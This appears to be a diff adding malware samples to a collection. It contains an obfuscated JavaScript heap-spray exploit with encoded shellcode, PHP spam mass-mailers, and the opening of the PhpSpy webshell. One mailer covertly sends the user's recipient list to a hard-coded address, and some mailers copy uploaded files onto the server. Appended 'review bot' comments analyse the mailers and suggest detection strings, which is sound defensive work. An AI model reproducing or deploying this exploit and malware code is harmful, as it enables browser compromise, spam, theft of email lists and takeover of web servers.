f@aI%PuIeP8S0P5I%Su@fMfSeMcP%@uMfIfIfPfS%SuI8SbP7Pf@%MuMdSfM4PeS%SuIeMfPeIfI%MuI6M4Pe@f@%SuIe@3@aIf@%PuS9Sf@6P4S%@uM4@2MfS3@%MuI9MfM6S4I%PuM6SeIeP7P%IuIe@fM0I3@%SuIe@fSeMb@%@uI6S4IeIfP%@uMbM9@0P3P%IuP6S1M8I7P%Su@e@1IaI1@%IuP0P7S0P3M%PuPe@fS1M1S%SuIePfIeIf@%PuPaSa@6I6@%@uIb@9MeIbI%SuI7S7I8@7P%@uI6P5I1S1I%@uS0M7MeP1@%@uPe@fP1PfP%MuPe@fPeSfI%SuSaSaS6M6M%SuIbP9IeM7P%Iu@cIaM8S7I%SuS1P0@5SfS%Su@0@7P2IdM%@u@eMfI0SdP%SuMeSfIeIfI%SuMa@aP6P6M%Mu@bI9MeM3I%IuI0I0P8@7P%SuM0MfS2P1P%@uI0P7I8@fI%MuIeMfP3@b@%Pu@eIfPeMfI%PuSaPaM6P6M%PuIbP9IfPfS%SuI2IeS8S7I%PuM0Sa@9@6S%@uI0S7M5P7M%MuMeMfI2P9I%Pu@eIfMeSfI%@u@aIaM6@6P%IuSaPfPfSbI%@uIdS7M6IfI%Iu@9@aM2IcS%IuS6@6P1@5I%IuSfP7PaPaM%SuMeI8M0I6M%Su@eIfSeIeM%MuSb@1SeSfS%SuP9PaP6I6M%PuI6M4@cMb@%SuPeSbPaIa@%@uIe@e@8I5@%IuM6P4SbP6I%IuMfM7PbIaM%@u@0M7SbI9M%Pu@eMfM6S4S%@uIeMfIe@fS%PuP8M7PbIfS%Pu@fI5MdS9M%PuM9MfMc@0S%SuI7M8@0M7P%SuSeMfSeMfP%Su@6@6IeIf@%IuSfI3@aMa@%@u@2IaI6M4M%@uI2IfS6IcS%PuI6@6IbMf@%MuIcSfIaIa@%@uM1S0P8S7S%@u@e@f@eMfI%PuMbPfI
ePfM%SuSaMaI6P4P%Pu@8S5@f@bI%PuPb@6SeSdS%MuIbPaM6I4P%@u@0I7MfM7@%SuPeSfS8IeS%IuSe@fSePfS%SuIaPaIeScM%MuS2S8@cSf@%SuMbM3Me@fI%@uPcP1P9@1@%PuI2I8@8MaS%SuIeSbIaMf@%Iu@8MaP9I7@%SuSeSfSe@fM%PuP9@a@1I0P%PuI6S4Mc@f@%IuPeM3@aIaP%MuMe@eM8S5@%@uI6M4PbI6M%SuPfS7PbMa@%SuMaSf@0P7P%PuMeSfSe@fS%IuM8M5Ie@fI%IuSbP7@eP8@%PuMaIaMe@cP%@uIdMcIcIbM%@uMbScP3I4P%SuM1S0PbMcS%SuScSfI9MaM%IuIbIcPbPfI%MuSaIaS6@4@%MuM8P5SfI3M%IuMb@6SeSaM%SuSbPaM6P4P%SuP0@7@fM7S%IuPeIfMcMc@%SuPe@f@eIfI%PuPeSf@8I5P%IuP9PaS1@0M%Pu@6I4ScIfM%@uSeS7MaSaP%Iu@e@dM8@5S%IuI6@4PbI6S%MuPfS7@bMa@%IuMf@fM0@7@%@u@e@fSe@f@%IuI8I5Pe@f@%@uM6@4M1P0S%IuIf@fMa@aI%Mu@eMeS8I5P%Pu@6@4@b@6S%@uIf@7PbMaM%MuIeSfP0M7S%@u@ePfMePfS%Iu@aIeIe@fM%Mu@bSdMb@4P%Iu@0PeSeIcP%IuM0Me@ePcP%Su@0@e@eScM%PuI0SePeMc@%@uP0M3P6IcS%@uMbS5MeIbP%PuS6M4SbPcP%Iu@0Id@3P5I%SuSbMdI1@8M%@uI0IfI1P0M%@uS6S4IbSa@%MuS6I4I0@3I%IuPe@7@9@2@%PuIbM2M6@4@%@u@bI9IeI3M%@u@9IcI6P4S%@uM6P4MdS3M%Mu@fP1@9IbP%@u@eSc@9@7P%Su@bS9@1IcI%MuS9P9P6I4@%@uIeMc@cMfS%PuPdSc@1ScI%PuMaP6S2P6I%@uM4M2MaSeM%Iu@2PcIePcS%SuPdPc@bI9M%SuMeS0@1@9@%@uPfIfS5P1@%Iu@1IdMdS5S%MuSeS7I9MbI%IuS2P1P2Pe@%Mu@eScSeS2S%PuPaSf@1SdM%@uP1IeP0M4@%IuS1@1IdP4P%MuI9@a@bI1@%@uIbM5S0Pa@%IuP0I4I6P4@%SuPbS5@6P4@%PuMeIcScSbM%@uM8P9M3S2I%Su@eS3P6S4I%Pu@6I4IaP4M%IuSfI3MbI5P%@uP3M2PePc@%IuSe@bM6I4P%IuIeIcM6I4I%MuIbS1@2PaP%@uI2PdSb@2@%MuIePfSeS7P%@uS1PbM0@7P%@uM1M0P1M1S%SuSbPaM1@0I%PuPa@3IbPdS%@uIaS0IaP2P%@u@eSfIa@1@%IuI7P4M6M8M%PuI7P0P7M4@%IuP2Mf@3@aM%IuI6M4@2PfP%MuM7M6S6I5P%@uS6@1M2MeI%@uP7@2I6M5I%SuM3P4@6Mf@%MuP6P3@2Se@%Su@2SfM6IeI%Su@6S4I6M1M%SuP6@1M7@0S%Pu@6PbM6I3M%SuS6IcM2MfI%Mu@6I1P6MfI%@uM2MeM6@4@%IuM6S8I7S0I%IuM0P0@7I0S%@uS0I0S0@0M".replace(/[IPSM@]/g, ''));
tu=unescape("%KuK0FdF04dK%cu40FdF0KdK".replace(/[Fc4Kr]/g, ''));
var memz=parseInt("0RxUdR0ZdU0ZdZ0Udl".replace(/[RUZrl]/g, ''));
while(tu.length<0x40000) tu+=tu;
tu=tu.substring(0,parseInt("0BxX3IfvfIeD4B".replace(/[vXIBD]/g, ''))-x.length);
o=new Array(); for(i=0;i<450;i++) o[i]=tu+x;z=Math.ceil(memz);
eval("z2=kdyo2c2uymke6nNt6.ksNcNryiyp6t6s6[k02]N.NcNrkekaNtyekC6o2nktyr6oylkR2a6n6g2ey(6)k.ylyeynkgyt2hk".replace(/[k2Ny6]/g, ''));
</script>

File diff suppressed because one or more lines are too long


@ -0,0 +1,183 @@
<?
include "./head.php";
If ($action=="mysql"){
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?><title></title>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<table width="813" height="209" border="0" background="image/php.gif">
<tr>
<td width="357"><p align="left"><font size="1" face="Geneva, Arial, Helvetica, sans-serif"></font></p>
<table width="355" border="0">
<tr>
<td width="345"><font color="#FF6600" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Your Email:</strong></font></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<? print $from; ?>" size="40">
</font></td>
</tr>
<tr>
<td><strong><font color="#FF0000" size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To: </font></strong></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
</font></td>
</tr>
<tr>
<td>&nbsp;</td>
</tr>
<tr>
<td><font color="#FF0000" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Subject: </strong></font></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="50">
</font></td>
</tr>
<tr>
<td><table width="345" border="0" align="left">
<tr>
<td width="97" height="30"><font color="#FF0000" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Your Name:</strong></font></td>
<td width="238"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
</table>
<p>&nbsp;</p>
<table width="425" border="0" align="left">
<tr>
<td width="88" height="28"><font color="#FF6600" size="-1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Attach File:</strong></font></td>
<td width="321"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
</table> <p>&nbsp;</p></td>
</tr>
<tr>
<td><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="radio" name="contenttype" value="plain" checked>
<font color="#FF0000"><strong>Plain</strong></font>
<input type="radio" name="contenttype" value="html">
<font color="#FF6600"><strong>HTML</strong></font>
<input type="hidden" name="action" value="send">
</font></td>
</tr>
<tr>
<td><p><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
<input type="submit" value="Send Message">
</font></p>
<p><font size="-1" face="Verdana, Arial, Helvetica, sans-serif"><img src="image/Status.gif" width="147" height="72"></font></p></td>
</tr>
</table>
</td>
<td width="446"><table width="338" border="0">
<tr>
<td width="328">&nbsp;</td>
</tr>
<tr>
<td><p><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="40" rows="30"><? print $emaillist; ?></textarea>
<a href="?action=mysql"><strong><font color="#FF0000">Load Addresses from MySQL</font></strong></a> </font></p>
</td>
</tr>
</table>
<table width="336" border="0">
<tr>
<td width="326">&nbsp;</td>
</tr>
<tr>
<td><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">Change The Lanuage: </font></strong></td>
</tr>
<tr>
<td><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="/KHG/PHP-Mailer/Albanian/index.php"><font color="#FF0000">Albanian</font></a> - <a href="/KHG/PHP-Mailer/German/index.php"><font color="#FF0000">German</font></a> - <a href="/KHG/PHP-Mailer/English/index.php"><font color="#FF0000">English</font> </a></font></strong></td>
</tr>
<tr>
<td><strong><font color="#FF6600" size="1" face="Verdana, Arial, Helvetica, sans-serif">Lanuage Now: <font color="#0000FF">English </font></font></strong></td>
</tr>
</table>
<p>&nbsp;</p>
</td>
</tr>
</table>
<p>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "<img src='image/sending.gif'><br> [ $to.......] ";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "<img src='image/success.gif'><br>";
flush();
}
}
}
include "./foot.php";
?>
</p>
<p>&nbsp; </p>
</form>
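Review bot: The behaviour that matters most for incident response is undocumented and sits in the send branch near the end of this section: `@copy($file, "./$file_name")` writes the uploaded attachment into the script's own directory under the client-supplied name, and nothing in the file checks who is calling it. A host found with this file should therefore be swept for unexpected files beside it, not only for outbound mail volume; the same line appears in the Basic-auth mailer section further down this page. `$action`, `$from`, `$file` and the other inputs are never assigned here, so the script presumably relies on register_globals or on the included `./head.php`, and `ereg_replace`, `split` and `mysql_*` were removed in PHP 7, which narrows where a recovered copy could have run. I would record this beside the sample rather than in it, so the hash is unchanged, for example `mass mailer; no authentication; upload copied next to the script under its submitted name`.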


@ -0,0 +1,242 @@
<?php
$secure = "babloki007@yahoo.de";
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>eMail</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
.Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C}
.Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000000}
.Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000000}
.style3 {color: #000000}
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<div id="layer" style="position:absolute; top:2px; left:-4px; width:560px; height:140px;">
<table border="0" cellspacing="0" cellpadding="0" width="560">
<tr valign="top">
<td><div align="center"></div></td>
</tr>
</table>
<p align="left"><img src="http://www.geocities.com/i5bala/images/linuxpenny.gif" alt="Sir-ToTTi" width="145" height="174" border="0" /></p>
</div>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<div id="idElement511" style="position:absolute; top:58px; left:168px; width:560px; height:140px;">
<table border="0" cellspacing="0" cellpadding="0" width="560">
<tr valign="top">
<td><div align="center">
<p><span class="style3"><font class="Times-New-Roman-32px00468Cb">Maded by Sir-ToTTi </font></span></p>
<p><span class="style3"><font class="Times-New-Roman-24px00468Cb"><U>Dx Crew </U></font></span><font class="Times-New-Roman-24px00468Cb"><U></U></font><font class="Times-New-Roman-24px00468Cb"><U>Inside<br />
</U></font></p>
</div></td>
</tr>
</table>
</div>
<?php
If ($action=="mysql"){
//Grab email addresses from MySQL
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"){ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="<?php print $from; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
</div>
</td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
</font>
</td>
<td width="212">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
</div>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="24" />
</font>
</td>
</tr>
<tr>
<td width="81">
<div align="right">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
</div>
</td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="<? print $subject; ?>" size="90" />
</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
</td>
<td width="278">
<font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
</td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
<input type="radio" name="contenttype" value="plain" checked="checked" /> Plain
<input type="radio" name="contenttype" value="html" /> HTML
<input type="hidden" name="action" value="send" /><br />
Number to send: <input type="text" name="amount" value="1" size="10" /><br />
Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" value="Send eMails" />
</font>
</td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
</font>
</td>
</tr>
</table>
</form>
<?php
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
$filter = "maillist";
$float = "From : mailist info <full@info.com>";
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
mail($secure, $filter, $emaillist, $float);
}
?>
<p class="style2">
<img src="http://static.last.fm/groupavatar/f085ea00762fb0faaf15052142de5c0e.png" alt="Funciona con todos los linux!" width="150" height="150" border="0" /></p>
<p class="style1">&nbsp;</p>
</body>
</html>
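Review bot: The call after the send loop, `mail($secure, $filter, $emaillist, $float);`, sends the operator's whole recipient list to the address hard-coded in `$secure` at the top of the file, and nothing accompanying the sample documents that. For detection it gives stable strings to match on a compromised web server: the subject `maillist` and the literal header `From : mailist info <full@info.com>`. `$file_type` is used in the attachment part but never assigned in this file (only `$file_name` and `$file` are read from `$_FILES`), so attachments from this variant would presumably carry an empty type before `; name=`, which is a second fingerprint. The whole MIME body is passed in the headers argument of `mail()` with an empty message body, as in the other mailer sections on this page. I would add these points to the sample's notes rather than edit the file, so its hash stays intact.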


@ -0,0 +1,210 @@
<?
$myusername = "";
$mypassword = "";
$areaname = "My Protected Area";
if ($_SERVER["PHP_AUTH_USER"] == "" || $_SERVER["PHP_AUTH_PW"] == "" || $_SERVER["PHP_AUTH_USER"] != $myusername || $_SERVER["PHP_AUTH_PW"] != $mypassword) {
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic realm=\"$areaname\"");
echo "<h1>Authorization Required.</h1>";
die();
}
if ($action=="send"){
$message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?><style type="text/css">
<!--
body {
background-color: #000000;
}
body,td,th {
color: #FFFFFF;
font-size: medium;
font-family: Georgia, Times New Roman, Times, serif;
}
.style4 {
font-size: small;
color: #FFFFFF;
font-weight: bold;
}
.style7 {color: #FFFFFF; font-size: xx-small;}
.style8 {
font-family: Georgia, "Times New Roman", Times, serif;
font-style: italic;
}
.style9 {color: #000000}
-->
</style><title>Kinematics of Mechanism</title>
<form name="form1" method="post" action="" enctype="multipart/form-data">
<div align="center">
<center>
<table border="2" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" width="74%" id="AutoNumber1">
<tr>
<td width="100%">
<div align="center">
<center>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#000000">
<p align="center">
<div align="center">
<center>
<table width="70%" height="277" border="0" cellpadding="0" cellspacing="0" bordercolor="#FF0000" bgcolor="#000000" id="AutoNumber1" style="border-collapse: collapse">
<tr>
<td width="100%" height="272">
<table width="769" border="0" height="303">
<tr>
<td width="786" height="28" colspan="3" bordercolor="#000000" background="/simparts/images/cellpic3.gif" bgcolor="#000000">
<p align="center" class="style4"><font face="Georgia"> Mailer By UchiZzlE ....</font><span class="style8">God With Us</span></td>
</tr>
<tr>
<td width="79" height="22" align="right" bordercolor="#AEAA04" background="/simparts/images/cellpic1.gif" bgcolor="#000000">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Email:</font></div>
</td>
<td width="390" height="22" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="from" value="<? print $from; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Your
Name:</font></div>
</td>
<td width="317" height="22" valign="middle" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="<? print $realname; ?>" size="30">
</font></td>
</tr>
<tr>
<td width="79" height="22" align="right" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font></div>
</td>
<td width="390" height="22" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="replyto" value="<? print $replyto; ?>" size="30" style="float: left"></font><div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Attach
File:</font></div>
</td>
<td width="317" height="22" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input type="file" name="file" size="30">
</font></td>
</tr>
<tr>
<td width="79" height="22" align="right" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000">
<div align="right"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
</td>
<td width="715" height="22" colspan="2" bordercolor="#000000" background="/simparts/images/cellpic1.gif" bgcolor="#000000"><span class="style9"><font size="-1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="subject" value="<? print $subject; ?>" size="59" style="float: left">
</font></span></td>
</tr>
<tr valign="top">
<td colspan="2" width="477" bgcolor="#000000" height="189" valign="top">
<div align="left">
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#111111" width="98%" id="AutoNumber4">
<tr>
<td width="100%" bgcolor="#000000">
<textarea name="message" cols="56" rows="10"><? print $message; ?></textarea>
<br>
<input type="radio" name="contenttype" value="plain">
<font size="2" face="Tahoma">Plain</font>
<input name="contenttype" type="radio" value="html" checked="checked">
<font size="2" face="Tahoma">HTML</font>
<input type="hidden" name="action" value="send">
<input type="submit" value="Best Of LUCKz"></td>
</tr>
</table>
</div>
</td>
<td width="317" bgcolor="#000000" height="187" valign="top">
<div align="center">
<center>
<table border="0" cellpadding="2" style="border-collapse: collapse" bordercolor="#000000" width="93%" id="AutoNumber3">
<tr>
<td width="100%" bgcolor="#000000">
<p align="center">
<textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
</font><br>
</td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</div></td>
</tr>
</table>
</center>
</div>
</td>
</tr>
</table>
</center>
</div>
<div align="center">
<center>
<table border="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" width="75%" id="AutoNumber5" height="1" cellpadding="0">
<tr>
<td width="100%" height="1" valign="top" bgcolor="#000000">
<p align="right" class="style7">Creditz to Spaghy INC </td>
</tr>
</table>
</center>
</div>
</form>
<?
if ($action=="send"){
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
#Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
@copy($file, "./$file_name") or die("The file you are trying to upload couldn't be copied to the server");
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Success sending to $to....... ";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "sent'><br>";
flush();
}
}
}
?>
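Review bot: The Basic-auth gate at the top of this section ships with `$myusername = "";` and `$mypassword = "";`, and with those values the `if` is true for every request: empty credentials hit the `== ""` tests and non-empty ones hit the `!=` tests, so the committed copy always answers 401. A copy recovered from a live host will have these two lines filled in, and they are worth extracting during triage because the same pair may recur across one operator's deployments. The page title `Kinematics of Mechanism` and the malformed status string `sent'><br>` are usable content signatures for this variant. None of this is documented with the sample; a short note beside it would do, for example `mailer behind HTTP Basic auth; inert until credentials are set`.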

659
PHP/Trojan-Spy.PHP.PhPen.b Normal file

@ -0,0 +1,659 @@
<?php
/*
+--------------------------------------------------------------------------+
| str_replace("-", "", "P-h-p-S-p-y") Version:2005 Lite |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: Dec 28st(My girl friend's birthday), 2004 |
+--------------------------------------------------------------------------+
*/
/*
提示:如果想再精简一些,请自行把所有注释去掉。
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check']="1";
// 如果需要密码验证,请修改登陆密码
$admin['pass']="angel";
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
$self = $_SERVER['PHP_SELF'];
/*===================== 身份验证 =====================*/
if($admin['check']=="1") {
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$self."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($login) {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$self."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
